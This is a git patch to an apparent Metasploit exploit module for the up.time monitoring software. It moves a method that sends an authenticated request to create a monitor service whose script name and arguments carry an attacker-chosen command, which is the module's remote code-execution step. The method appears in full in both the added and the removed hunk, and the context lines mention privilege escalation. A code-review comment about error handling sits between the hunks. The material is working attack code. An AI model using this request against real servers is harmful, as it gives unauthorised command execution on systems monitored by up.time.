From 6f02cedff8cb2ce844e773f93ca4e1de3b90cf0e Mon Sep 17 00:00:00 2001
From: wchen-r7
Date: Fri, 23 Oct 2015 13:10:00 -0500
Subject: [PATCH] Move method create_exec_service
---
 .../exploits/multi/http/uptime_code_exec.rb | 178 +++++++++---------
 1 file changed, 88 insertions(+), 90 deletions(-)
diff --git a/modules/exploits/multi/http/uptime_code_exec.rb b/modules/exploits/multi/http/uptime_code_exec.rb
index 5cb9e675b5..b3ac14f82b 100644
--- a/modules/exploits/multi/http/uptime_code_exec.rb
+++ b/modules/exploits/multi/http/uptime_code_exec.rb
@@ -64,6 +64,94 @@ class Metasploit4 < Msf::Exploit::Remote
 Exploit::CheckCode::Safe
 end
 
+ def create_exec_service(*args)
+ cookie_split, rhost, uploadpath, phppath, phpfile_name, cmd, cmdargs = *args
+ res_service = send_request_cgi(
+ 'method' => 'POST',
+ 'uri' => normalize_uri(target_uri.path, 'main.php'),
+ 'cookie' => "#{cookie_split[1]}; #{cookie_split[2]}",
+ 'vars_get' => {
+ 'section' => 'ERDCInstance',
+ 'subsection' => 'add',
+ },
+ 'vars_post' => {
+ 'initialERDCId' => '20',
+ 'target' => '1',
+ 'targetType' => 'systemList',
+ 'systemList' => '1',
+ 'serviceGroupList' => '-10',
+ 'initialMode' => 'standard',
+ 'erdcName' => 'Exploit',
+ 'erdcInitialName' => '',
+ 'erdcDescription' => 'Exploit',
+ 'hostButton' => 'system',
+ 'erdc_id' => '20',
+ 'forceReload' => '0',
+ 'operation' => 'standard',
+ 'erdc_instance_id' => '',
+ 'label_[184]' => 'Script Name',
+ 'value_[184]' => cmd,
+ 'id_[184]' => 'process',
+ 'name_[process]' => '184',
+ 'units_[184]' => '',
+ 'guiBasic_[184]' => '1',
+ 'inputType_[184]' => 'GUIString',
+ 'screenOrder_[184]' => '1',
+ 'parmType_[184]' => '1',
+ 'label_[185]' => 'Arguments',
+ 'value_[185]' => cmdargs,
+ 'id_[185]' => 'args',
+ 'name_[args]' => '185',
+ 'units_[185]' => '',
+ 'guiBasic_[185]' => '1',
+ 'inputType_[185]' => 'GUIString',
+ 'screenOrder_[185]' => '2',
+ 'parmType_[185]' => '1',
+ 'label_[187]' => 'Output',
+ 'can_retain_[187]' => 'false',
+ 'comparisonWarn_[187]' => '-1',
+ 'comparison_[187]' => '-1',
+ 'id_[187]' => 'value_critical_output',
+ 'name_[output]' => '187',
+ 'units_[187]' => '',
+ 'guiBasic_[187]' => '1',
+ 'inputType_[187]' => 'GUIString',
+ 'screenOrder_[187]' => '4',
+ 'parmType_[187]' => '2',
+ 'label_[189]' => 'Response time',
+ 'can_retain_[189]' => 'false',
+ 'comparisonWarn_[189]' => '-1',
+ 'comparison_[189]' => '-1',
+ 'id_[189]' => 'value_critical_timer',
+ 'name_[timer]' => '189',
+ 'units_[189]' => 'ms',
+ 'guiBasic_[189]' => '0',
+ 'inputType_[189]' => 'GUIInteger',
+ 'screenOrder_[189]' => '6',
+ 'parmType_[189]' => '2',
+ 'timing_[erdc_instance_monitored]' => '1',
+ 'timing_[timeout]' => '60',
+ 'timing_[check_interval]' => '10',
+ 'timing_[recheck_interval]' => '1',
+ 'timing_[max_rechecks]' => '3',
+ 'alerting_[notification]' => '1',
+ 'alerting_[alert_interval]' => '120',
+ 'alerting_[alert_on_critical]' => '1',
+ 'alerting_[alert_on_warning]' => '1',
+ 'alerting_[alert_on_recovery]' => '1',
+ 'alerting_[alert_on_unknown]' => '1',
+ 'time_period_id' => '1',
+ 'pageFinish' => 'Finish',
+ 'pageContinue' => 'Continue...',
+ 'isWizard' => '1',
+ 'wizardPage' => '2',
+ 'wizardNumPages' => '2',
+ 'wizardTask' => 'pageFinish',
+ 'visitedPage[1]' => '1',
+ 'visitedPage[2]' => '1'
+ })
+ end
+
 def exploit
 vprint_status('Trying to login...')
 # #Application Login
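Review bot: `res_service` is assigned from `send_request_cgi` but never inspected inside `create_exec_service`, so a nil response (connection closed, timeout) or an unexpected status is passed on silently; the method's value is only the assignment's implicit return, and whether the caller in `exploit` checks it lies outside this hunk. A guard directly after the call, `fail_with(Failure::Unreachable, 'No response while creating the monitor service') unless res_service`, followed by `res_service` as the explicit last expression, would surface the failure where it happens. The `*args` destructuring also binds `rhost`, `uploadpath`, `phppath` and `phpfile_name` that the body never reads; prefixing them with underscores (`_rhost, _uploadpath, _phppath, _phpfile_name`) or narrowing the argument list would make the method's real inputs (`cookie_split`, `cmd`, `cmdargs`) obvious to the reader. The body itself is identical to the copy removed in the second hunk, so these points apply equally to the pre-move code.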
@@ -173,96 +261,6 @@ class Metasploit4 < Msf::Exploit::Remote
 print_good('Priv. Escalation success')
 end
 
- # CREATING EXEC Service
-
- def create_exec_service(*args)
- cookie_split, rhost, uploadpath, phppath, phpfile_name, cmd, cmdargs = *args
- res_service = send_request_cgi(
- 'method' => 'POST',
- 'uri' => normalize_uri(target_uri.path, 'main.php'),
- 'cookie' => "#{cookie_split[1]}; #{cookie_split[2]}",
- 'vars_get' => {
- 'section' => 'ERDCInstance',
- 'subsection' => 'add',
- },
- 'vars_post' => {
- 'initialERDCId' => '20',
- 'target' => '1',
- 'targetType' => 'systemList',
- 'systemList' => '1',
- 'serviceGroupList' => '-10',
- 'initialMode' => 'standard',
- 'erdcName' => 'Exploit',
- 'erdcInitialName' => '',
- 'erdcDescription' => 'Exploit',
- 'hostButton' => 'system',
- 'erdc_id' => '20',
- 'forceReload' => '0',
- 'operation' => 'standard',
- 'erdc_instance_id' => '',
- 'label_[184]' => 'Script Name',
- 'value_[184]' => cmd,
- 'id_[184]' => 'process',
- 'name_[process]' => '184',
- 'units_[184]' => '',
- 'guiBasic_[184]' => '1',
- 'inputType_[184]' => 'GUIString',
- 'screenOrder_[184]' => '1',
- 'parmType_[184]' => '1',
- 'label_[185]' => 'Arguments',
- 'value_[185]' => cmdargs,
- 'id_[185]' => 'args',
- 'name_[args]' => '185',
- 'units_[185]' => '',
- 'guiBasic_[185]' => '1',
- 'inputType_[185]' => 'GUIString',
- 'screenOrder_[185]' => '2',
- 'parmType_[185]' => '1',
- 'label_[187]' => 'Output',
- 'can_retain_[187]' => 'false',
- 'comparisonWarn_[187]' => '-1',
- 'comparison_[187]' => '-1',
- 'id_[187]' => 'value_critical_output',
- 'name_[output]' => '187',
- 'units_[187]' => '',
- 'guiBasic_[187]' => '1',
- 'inputType_[187]' => 'GUIString',
- 'screenOrder_[187]' => '4',
- 'parmType_[187]' => '2',
- 'label_[189]' => 'Response time',
- 'can_retain_[189]' => 'false',
- 'comparisonWarn_[189]' => '-1',
- 'comparison_[189]' => '-1',
- 'id_[189]' => 'value_critical_timer',
- 'name_[timer]' => '189',
- 'units_[189]' => 'ms',
- 'guiBasic_[189]' => '0',
- 'inputType_[189]' => 'GUIInteger',
- 'screenOrder_[189]' => '6',
- 'parmType_[189]' => '2',
- 'timing_[erdc_instance_monitored]' => '1',
- 'timing_[timeout]' => '60',
- 'timing_[check_interval]' => '10',
- 'timing_[recheck_interval]' => '1',
- 'timing_[max_rechecks]' => '3',
- 'alerting_[notification]' => '1',
- 'alerting_[alert_interval]' => '120',
- 'alerting_[alert_on_critical]' => '1',
- 'alerting_[alert_on_warning]' => '1',
- 'alerting_[alert_on_recovery]' => '1',
- 'alerting_[alert_on_unknown]' => '1',
- 'time_period_id' => '1',
- 'pageFinish' => 'Finish',
- 'pageContinue' => 'Continue...',
- 'isWizard' => '1',
- 'wizardPage' => '2',
- 'wizardNumPages' => '2',
- 'wizardTask' => 'pageFinish',
- 'visitedPage[1]' => '1',
- 'visitedPage[2]' => '1'
- })
- end
-
 # CREATING Linux EXEC Service
 if res_auth && res_auth.headers['Server'] =~ /Unix/
 vprint_status('Creating Linux Monitor Code exec...')